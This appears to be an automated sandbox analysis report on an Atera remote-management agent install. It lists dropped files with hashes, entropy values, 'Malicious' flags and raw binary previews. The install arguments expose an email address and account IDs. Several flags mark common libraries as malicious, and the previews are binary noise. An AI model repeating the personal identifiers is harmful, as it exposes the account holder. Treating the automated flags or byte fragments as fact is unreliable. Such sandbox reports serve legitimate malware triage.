                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:/i /IntegratorLogin=primepecasuti@gmail.com /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000OgujIIAR /AgentId=ef8472c8-8ede-4877-a4a2-21e52a229933.17/12/2024 12:45:28 Trace Starting..17/12/2024 12:45:51 Trace Starting..

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AteraAgent.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2402
                                                                                                                                                                                                                                        Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                        MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                        SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                        SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                        SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                                        Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                        MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                        SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                        SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                        SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                        C:\Windows\Installer\442ace.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878657935554641
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        MD5:730547D4A223468FC2D62E952CAC6FF7
                                                                                                                                                                                                                                        SHA1:E5C8739F303913647D811A6F63749E9A66FBB70A
                                                                                                                                                                                                                                        SHA-256:8C4DE817222FDC2F782D6012C1D11B10F5C270B88053C27C088E7CBDA75936E5
                                                                                                                                                                                                                                        SHA-512:884F80716C8CACBC130ED85D7306D5B2F4DF7A181FDB99C46AEC43B7796EF5E400CDD15A6DBAAAD6F3A221F1E46E9EC0E50A2CFE76A72EA953C182CE4B8AE395
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\442ad0.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878657935554641
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        MD5:730547D4A223468FC2D62E952CAC6FF7
                                                                                                                                                                                                                                        SHA1:E5C8739F303913647D811A6F63749E9A66FBB70A
                                                                                                                                                                                                                                        SHA-256:8C4DE817222FDC2F782D6012C1D11B10F5C270B88053C27C088E7CBDA75936E5
                                                                                                                                                                                                                                        SHA-512:884F80716C8CACBC130ED85D7306D5B2F4DF7A181FDB99C46AEC43B7796EF5E400CDD15A6DBAAAD6F3A221F1E46E9EC0E50A2CFE76A72EA953C182CE4B8AE395
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\442ad1.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\442add.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2E58.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
